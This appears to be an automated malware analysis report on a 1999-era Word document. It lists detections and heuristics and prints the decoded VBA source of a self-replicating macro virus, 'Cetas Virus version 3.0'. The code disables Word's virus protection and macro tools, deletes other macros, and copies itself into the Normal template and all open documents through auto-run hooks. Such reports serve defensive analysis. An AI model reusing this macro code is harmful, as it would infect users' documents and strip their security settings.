Office (OLE) malware analysis — malicious · a8d5c8b884f7edda

MALICIOUS

Office (OLE)

93.5 KB Created: 1999-10-09 11:29:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 222e2a98b297ab27cc70cf252f8a67ba SHA-1: 28813e3474c8c16171bee4b198ea7b7706f3a504 SHA-256: a8d5c8b884f7eddac32720bf7f5cc8c426dc97c87c1017aef2bffb3ae0c5ba94

240 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic

The sample is identified as malicious by ClamAV with multiple detections, including Win.Trojan.Pivis-2 and Doc.Trojan.Opey-12. It contains VBA macros, specifically an AutoOpen macro and an Auto_Close macro, which are commonly used to execute malicious code upon opening or closing the document. The script attempts to disable security features within Microsoft Word, such as macro protection and the 'Visual Basic' command bar, indicating an intent to hinder analysis and facilitate further malicious actions.

Heuristics 5

ClamAV: Win.Trojan.Pivis-2 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Win.Trojan.Pivis-2
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Auto_Close macro high OLE_VBA_AUTOCLOSE

Auto_Close macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	18755 bytes
SHA-256: `7904a68517a24dbe4d20b6d0934cfb34ff314a2a93a9b979559c580c1b4d8a72`
Detection ClamAV: Doc.Trojan.Opey-12 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "xHeCs3" Sub vxConTrol() ' ' Cetas Virus version 3.0 by xHeCs ' ATTENTION LAMERS that's you !!!. ' You can learn a lot from this virus, But Please respect ' What is not yours. ' On Error Resume Next Application.UserName = "PAcMAn" Application.UserAddress = "PAcMAn ZonE" Application.UserInitials = "xHeCs" With Dialogs(wdDialogFileSummaryInfo) .Author = "xHeCs" .Comments = "Life is like a box of chocolate you'll never know what your gonna get :)" .Execute End With With Options .ConfirmConversions = False .VirusProtection = False .SaveNormalPrompt = False End With With ActiveDocument .ReadOnlyRecommended = False End With On Error Resume Next CommandBars("Visual Basic").Visible = False CommandBars("Visual Basic").Enabled = False CommandBars("Visual Basic").Protection = msoBarNoChangeVisible CommandBars("Visual Basic").Protection = msoBarNoCustomize CommandBars("Tools").Controls("Macro").Delete CommandBars("Tools").Controls("Customize...").Delete CustomizationContext = NormalTemplate FindKey(BuildKeyCode(wdKeyF11, wdKeyAlt)).Disable FindKey(BuildKeyCode(wdKeyF8, wdKeyAlt)).Disable NTInfected = False For I = NormalTemplate.VBProject.VBComponents.Count To 1 Step -1 clan = NormalTemplate.VBProject.VBComponents(I).Name If clan = "xHeCs3" Then NTInfected = True If (clan <> "xHeCs3") And (clan <> "ThisDocument") Then Application.OrganizerDelete Source:=NormalTemplate.FullName, Name:=clan, Object:=wdOrganizerObjectProjectItems Next I For Each opendoc In Documents ODInfected = False With opendoc For J = opendoc.VBProject.VBComponents.Count To 1 Step -1 clan = opendoc.VBProject.VBComponents(J).Name If clan = "xHeCs3" Then ODInfected = True If (clan <> "xHeCs3") And (clan <> "ThisDocument") And (clan <> "Reference to Normal") Then Application.OrganizerDelete Source:=opendoc.FullName, Name:=clan, Object:=wdOrganizerObjectProjectItems Next J If ODInfected = False Then Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=opendoc.FullName, Name:="xHeCs3", Object:=wdOrganizerObjectProjectItems opendoc.SaveAs FileName:=opendoc.FullName End If End With Next opendoc If NTInfected = False Then Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="xHeCs3", Object:=wdOrganizerObjectProjectItems NormalTemplate.Save End If Application.VBE.ActiveVBProject.VBComponents("xHeCs3").Export "c:\WinCTL.sys" For I = 1 To NormalTemplate.VBProject.VBComponents.Count If NormalTemplate.VBProject.VBComponents(I).Name = "xHeCs3" Then NormInstall = True Next I For I = 1 To ActiveDocument.VBProject.VBComponents.Count If ActiveDocument.VBProject.VBComponents(I).Name = "xHeCs3" Then ActivInstall = True Next I If ActivInstall = True And NormInstall = False Then Set Target = NormalTemplate.VBProject _ Else: If ActivInstall = False And NormInstall = True Then Set Target = ActiveDocument.VBProject Target.VBComponents.Import ("c:\WinCtl.sys") End Sub Sub FileSave() On Error Resume Next Call vxConTrol ActiveDocument.Save End Sub Sub FileClose() On Error Resume Next Call vxConTrol If ActiveDocument.Saved = False Then ActiveDocument.Save ActiveDocument.Close End Sub Sub AutoOpen() On Error Resume Next Call vxConTrol End Sub Sub FileExit() On Error Resume Next Call vxConTrol If ActiveDocument.Saved = False Then ActiveDocument.Save Application.quit End Sub Sub FileNew() ... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.